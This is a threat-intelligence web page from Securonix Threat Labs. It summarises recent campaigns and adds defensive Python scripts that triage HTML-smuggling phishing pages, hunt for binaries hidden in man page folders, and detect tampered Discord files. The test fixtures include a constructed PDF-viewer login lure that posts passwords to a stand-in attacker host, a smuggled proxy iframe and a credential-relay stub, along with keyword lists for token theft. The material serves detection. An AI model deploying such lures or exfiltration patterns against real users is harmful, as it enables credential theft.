Securonix Threat Labs

Get up-to-date threat content from the experts at Securonix Threat Labs.

Uncover the threats of tomorrow, today.

Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.

Powered by Threat Labs

Autonomous Threat Sweeper

Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.

Latest ATS Entries

All indicators of compromise (IOC) and Spotter queries are available on our GitHub repository.

Intel Source:
Microsoft
Intel Name:
North_Korean_Hackers_Linked_to_New_FakePenny_Ransomware
Date of Scan:
2024-05-29
Impact:
MEDIUM
Summary:
Microsoft researchers have identified a new North Korean threat actor, tracked as Moonstone Sleet (formerly Storm-1789). The actor targets companies for both financial gain and cyberespionage, combining well-established tradecraft shared with other North Korean groups with attack methods of its own. To engage potential targets, Moonstone Sleet sets up fake companies and job opportunities, distributes trojanized copies of legitimate tools, builds malicious games, and deploys new custom ransomware.
Source: https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
Intel Source:
Proofpoint
Intel Name:
Uncovers_Piano_Themed_Email_Scam
Date of Scan:
2024-05-29
Impact:
LOW
Summary:
Proofpoint researchers have observed a cluster of malicious email campaigns that use piano-themed lures to draw recipients into advance fee fraud (AFF) scams. The campaigns have been running since at least January 2024 and remain active. Most messages target students and faculty at North American colleges and universities, with some activity against other sectors such as healthcare and food and beverage services. Proofpoint has seen at least 125,000 messages tied to this cluster so far in 2024.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-sing-us-song-youre-piano-scam
Intel Source:
Resecurity
Intel Name:
Online_scams_during_Hajj_season
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Resecurity researchers observed a rise in fraud schemes targeting Hajj pilgrims, including fake websites and social media accounts impersonating Nusuk, the official Hajj platform. The fraudsters harvest sensitive information for identity theft and financial fraud; Resecurity reports having blocked more than 630 accounts distributing such content. The article advises verifying the authenticity of websites, using official ministry accounts, obtaining written agreements, and reporting scams to the authorities, stressing caution and awareness during the Hajj season.
Source: https://www.resecurity.com/blog/article/navigating-the-hajj-season-a-time-of-spiritual-unity-and-rising-cyber-threats-targeting-consumers
Intel Source:
Check Point
Intel Name:
WIDESPREAD_NSIS_BASED_MALICIOUS_PACKER_FAMILY
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Check Point researchers have analyzed a widespread malicious packer family built on NSIS (Nullsoft Scriptable Install System). The packer uses compression and encryption to turn one payload into many unique samples, which hinders antivirus detection and analysis, and it has been seen protecting malware families such as AgentTesla, Remcos, and XLoader. An NSIS-packed sample typically ships encrypted files alongside a malicious DLL that decrypts the payload and executes it.
Source: https://research.checkpoint.com/2024/static-unpacking-for-the-widespread-nsis-based-malicious-packer-family/
Intel Source:
ISC.SANS
Intel Name:
Using_Passive_DNS_sources
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
An ISC SANS diary provides a guide to tools and services for DNS reconnaissance and enumeration during penetration tests, including Shodan for additional host information and the Cisco Umbrella Investigate API for passive DNS data. It covers practical applications, limitations, and API usage examples, and highlights the value of passive DNS in identifying network assets and potential exposure.
Source: https://isc.sans.edu/diary/28596
Intel Source:
Forcepoint
Intel Name:
Beware_of_HTML_Masquerading_as_PDF_Viewer_Login_Pages
Date of Scan:
2024-05-28
Impact:
MEDIUM
Summary:
Forcepoint X-Labs researchers have observed a large volume of phishing emails in their telemetry targeting government departments across APAC; the HTML phishing pages masquerade as PDF viewer login pages to harvest credentials.
Source: https://www.forcepoint.com/blog/x-labs/html-phishing-pdf-viewer-login-apac
Intel Source:
Huntress
Intel Name:
Discovering_the_Middle_Tradecraft_HTML_Smuggling_Adversary
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Huntress researchers have mapped the infrastructure of a widespread phishing campaign whose tradecraft combines a transparent (adversary-in-the-middle) proxy, injected iframes, and HTML smuggling. The victim is shown a locally rendered page containing an iframe of the Outlook login portal served through the attacker's transparent proxy; because the proxy relays the live login, the attacker steals the credentials and gets around MFA.
Source: https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft
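Both the Forcepoint entry (HTML posing as a PDF viewer login) and the Huntress entry (HTML smuggling that drops a page with a proxied login iframe) come down to the same question for a mail-security or SOC analyst: what does this HTML actually do once it renders? The triage script below is an added example, not code from either vendor's report. It looks for the browser primitives HTML smuggling needs, decodes long base64 runs and scans the recovered document as a further layer, follows iframe `srcdoc` content, and flags password forms together with where they post and whether the title imitates a PDF viewer. The two sample documents and all hostnames in them are constructed for this example.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Browser APIs that HTML smuggling relies on to materialise a payload client-side.
SMUGGLING_APIS = ("atob(", "new Blob(", "URL.createObjectURL(", "msSaveOrOpenBlob", "document.write(")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")          # long base64 literals worth decoding
LURE_TITLE = re.compile(r"pdf|adobe|document viewer", re.I)  # heuristic for the PDF-viewer lure


class _Extract(HTMLParser):
    """Collect the few tags the triage cares about: title, iframes, forms, password inputs."""
    def __init__(self):
        super().__init__()
        self.title, self._in_title = "", False
        self.iframes, self.form_actions, self.password_inputs = [], [], 0

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "title":
            self._in_title = True
        elif tag == "iframe":
            self.iframes.append(a)
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def triage_html(html: str, depth: int = 0, max_depth: int = 3) -> list:
    """Return findings for one HTML document, recursing into HTML it smuggles in base64 or
    carries in an iframe srcdoc. 'layer N' says how many decode steps deep a finding sits."""
    p = _Extract()
    p.feed(html)
    tag = f"layer {depth}"
    findings = []

    apis = [a for a in SMUGGLING_APIS if a in html]
    if apis:
        findings.append(f"{tag}: smuggling primitives {apis}")

    hosts = sorted({h for h in (urlparse(f.get("src", "")).hostname for f in p.iframes
                                if f.get("src", "").startswith("http")) if h})
    if hosts:
        findings.append(f"{tag}: iframe embeds a remote login surface from {hosts}")
    for f in p.iframes:
        if f.get("srcdoc") and depth < max_depth:
            findings.extend(triage_html(f["srcdoc"], depth + 1, max_depth))

    if p.password_inputs:
        external = [a for a in p.form_actions if a.startswith("http")]
        findings.append(f"{tag}: password field; form posts to {external or 'same document'}")
        if LURE_TITLE.search(p.title):
            findings.append(f"{tag}: title imitates a PDF viewer login ({p.title.strip()!r})")

    if depth < max_depth:
        for m in B64_RUN.finditer(html):
            try:
                blob = base64.b64decode(m.group(0), validate=True)
            except binascii.Error:
                continue
            try:
                inner = blob.decode("utf-8")
            except UnicodeDecodeError:
                findings.append(f"{tag}: {len(blob)}-byte binary blob in base64 (smuggled file?)")
                continue
            if "<" in inner:
                findings.extend(triage_html(inner, depth + 1, max_depth))
    return findings


# Constructed samples (not from the Huntress or Forcepoint reports); hostnames are placeholders.
INNER = """<html><head><title>Sign in to your account</title></head><body>
<iframe src="https://login.microsoftonline.com.example-proxy.test/common/oauth2/authorize?client_id=1"
        style="border:0;width:100%;height:100%"></iframe>
</body></html>"""
SMUGGLED = ('<html><body><script>var d=atob("' + base64.b64encode(INNER.encode()).decode()
            + '");document.write(d);</script></body></html>')
PDF_LURE = """<html><head><title>Adobe PDF Viewer - Sign in to view document</title></head><body>
<form method="post" action="https://collect.example-attacker.test/submit">
<input name="email"><input type="password" name="pw"><button>Open PDF</button></form></body></html>"""

if __name__ == "__main__":
    for name, doc in (("smuggled", SMUGGLED), ("pdf_lure", PDF_LURE)):
        print(name, *triage_html(doc), sep="\n  ")
```

The point of the layered output is that the outer file of a smuggling lure is deliberately boring: the iframe pointing at the proxy only appears after decoding, so a scanner that stops at the first layer sees nothing but a script tag. The regex-based base64 hunt is a heuristic; attackers that split or XOR the payload need the decoder extended accordingly.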
Intel Source:
Tenable
Intel Name:
Kinsing_malware_hides_itself
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Tenable researchers found that Kinsing also targets Apache Tomcat servers and now uses new techniques to hide on the filesystem, persisting from innocuous-looking locations such as manual page directories. The article presents the technical findings and shares indicators of compromise (IOCs) to help defenders.
Source: https://www.tenable.com/blog/kinsing-malware-hides-itself-as-a-manual-page-and-targets-cloud-servers
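The durable hunt for this kind of hiding is not the filename but the mismatch between where a file lives and what it is: nothing under a man page tree should be an ELF binary, a script, or executable. The scanner below is an added example, not Tenable's tooling or Kinsing's own code. It walks documentation roots (the default paths are an assumption; adjust for your distribution), peeks through one layer of gzip because man pages are normally compressed and a gzip-wrapped binary would otherwise look like a compressed page, and `demo_tree` builds a constructed tree with a hypothetical dropped-file name so the check runs offline.

```python
import gzip
import os
import stat
import tempfile
from pathlib import Path

ELF_MAGIC = b"\x7fELF"
GZIP_MAGIC = b"\x1f\x8b"
# Documentation trees: nothing executable belongs here. Assumed defaults; extend as needed.
DEFAULT_ROOTS = ("/usr/share/man", "/usr/local/share/man")


def _content_head(path: Path, n: int = 4) -> bytes:
    """First n bytes of the file, looking through one layer of gzip because man pages are
    normally gzipped and a gzip-wrapped ELF would otherwise pass as a compressed page."""
    with path.open("rb") as f:
        head = f.read(n)
    if head.startswith(GZIP_MAGIC):
        try:
            with gzip.open(path, "rb") as g:
                return g.read(n)
        except (OSError, EOFError):
            return head
    return head


def hunt(roots=DEFAULT_ROOTS) -> list:
    """Walk each root and report regular files that are ELF, start with a shebang, or carry an
    executable bit. Symlinks are skipped (many man pages are links to other pages)."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                p = Path(dirpath, name)
                try:
                    st = p.lstat()
                    if not stat.S_ISREG(st.st_mode):
                        continue
                    head = _content_head(p)
                except OSError:
                    continue
                reasons = []
                if head.startswith(ELF_MAGIC):
                    reasons.append("ELF binary")
                elif head.startswith(b"#!"):
                    reasons.append("script with shebang")
                if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                    reasons.append("executable bit set")
                if reasons:
                    hits.append({"path": str(p), "size": st.st_size, "reasons": reasons})
    return hits


def demo_tree() -> list:
    """Constructed man tree in a temp dir: one ordinary gzipped page, one gzip-wrapped ELF
    named like a page (hypothetical name), and one bare ELF with the exec bit set."""
    root = Path(tempfile.mkdtemp()) / "man"
    (root / "man1").mkdir(parents=True)
    fake_elf = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 61   # ELF ident only; not a runnable binary
    (root / "man1" / "ls.1.gz").write_bytes(gzip.compress(b".TH LS 1\n.SH NAME\nls - list directory contents\n"))
    (root / "man1" / "man.8.gz").write_bytes(gzip.compress(fake_elf))
    dropper = root / "man1" / "README"
    dropper.write_bytes(fake_elf)
    dropper.chmod(0o755)
    return hunt([str(root)])


if __name__ == "__main__":
    import sys
    for hit in hunt(sys.argv[1:] or DEFAULT_ROOTS):
        print(hit)
```

Run it as root with the roots you care about as arguments and diff the output against a known-good host; on a clean system it should print nothing. Pair it with the IOCs from the Tenable article for the specific campaign, and keep the content check even after those IOCs age out.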
Intel Source:
STR
Intel Name:
Potential_C2_Seeder_Queries_05282024
Date of Scan:
2024-05-28
Impact:
MEDIUM
Summary:
This research is published by the Securonix Threat Labs Threat Research Team.
Source: https://github.com/str-int-repo/str-seeder-behavior-queries
Intel Source:
CYFIRMA
Intel Name:
Iluria_Stealer_is_Variant_of_Another_Discord_Stealer
Date of Scan:
2024-05-27
Impact:
LOW
Summary:
Like the Discord stealer it derives from, Iluria Stealer is an NSIS installer bundling an obfuscated Electron application. In its second stage it downloads a malicious JavaScript file that replaces Discord's index.js; at runtime that file decrypts its payload code to steal Discord tokens and browser credentials. The injected file also intercepts any account changes, such as password or email updates and 2FA activation, and relays them to the attacker's command and control (C2) server.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_iluria-stealer-a-variant-of-another-discord-activity-7199376961935138817-74OP?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
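Because the stealer persists by overwriting one known file, a file-integrity check against the stock content is a cheap way to catch this family and its relatives. The script below is an added example, not CYFIRMA's analysis or the stealer's code. It assumes the stock `discord_desktop_core/index.js` is a one-line require of `core.asar` and that the client lives under `%LOCALAPPDATA%\Discord` in `app-*` version folders; verify both against a clean install of the version you run. The tampered sample it scans is constructed to match the behaviour described above, not the real injected file.

```python
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Stock discord_desktop_core/index.js is a one-line require of core.asar (assumption: verify against
# a clean install of the version you run; the point of the check is any deviation from it).
EXPECTED_INDEX_JS = "module.exports = require('./core.asar');"
INDEX_GLOB = "app-*/modules/discord_desktop_core-*/discord_desktop_core/index.js"
# Strings a tampered index.js tends to carry when it harvests tokens and relays account changes.
INDICATORS = ("token", "webhook", "password", "mfa", "2fa", "http", "fetch(", "XMLHttpRequest", "eval(")
DEFAULT_ROOT = os.path.join(os.environ.get("LOCALAPPDATA", ""), "Discord")  # assumed Windows install path


def _norm(js: str) -> str:
    return re.sub(r"\s+", " ", js).strip()


def check_install(root=DEFAULT_ROOT) -> list:
    """Compare every discord_desktop_core/index.js under root with the stock one-liner."""
    results = []
    for p in sorted(Path(root).glob(INDEX_GLOB)):
        text = p.read_text(encoding="utf-8", errors="replace")
        tampered = _norm(text) != _norm(EXPECTED_INDEX_JS)
        lowered = text.lower()
        results.append({
            "path": str(p),
            "sha256": hashlib.sha256(text.encode("utf-8")).hexdigest(),
            "size": len(text),
            "tampered": tampered,
            "indicators": [i for i in INDICATORS if i.lower() in lowered] if tampered else [],
        })
    return results


# Constructed stand-in for an injected index.js: not Iluria's code, only the shape described
# (intercept account changes, relay them, then hand control to the real module).
TAMPERED_SAMPLE = """const https = require('https');
function relay(data) { /* POST to attacker C2 (constructed sample, no real endpoint) */ }
process.on('message', m => { if (/token|password|mfa/i.test(String(m))) relay(m); });
module.exports = require('./core.asar');
"""


def demo_tree() -> list:
    """Two fake app-* installs in a temp dir: one clean, one with the constructed injected file."""
    root = Path(tempfile.mkdtemp()) / "Discord"
    for version, body in (("app-1.0.9001", EXPECTED_INDEX_JS + "\n"), ("app-1.0.9002", TAMPERED_SAMPLE)):
        d = root / version / "modules" / "discord_desktop_core-1" / "discord_desktop_core"
        d.mkdir(parents=True)
        (d / "index.js").write_text(body, encoding="utf-8")
    return check_install(root)


if __name__ == "__main__":
    for r in check_install():
        print("TAMPERED" if r["tampered"] else "clean   ", r["path"], r["indicators"])
```

A hit means the file should be quarantined and the Discord token and browser passwords on that host treated as compromised; the stealer also watches for password and 2FA changes, so rotate credentials from a clean machine rather than the infected one.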

Threat Content

Shared Security Content on Sigma

Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries on Sigma, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.

Why Security Content Matters

Learn how Securonix is paving the way to make precise, and actionable security content a reality for our customers.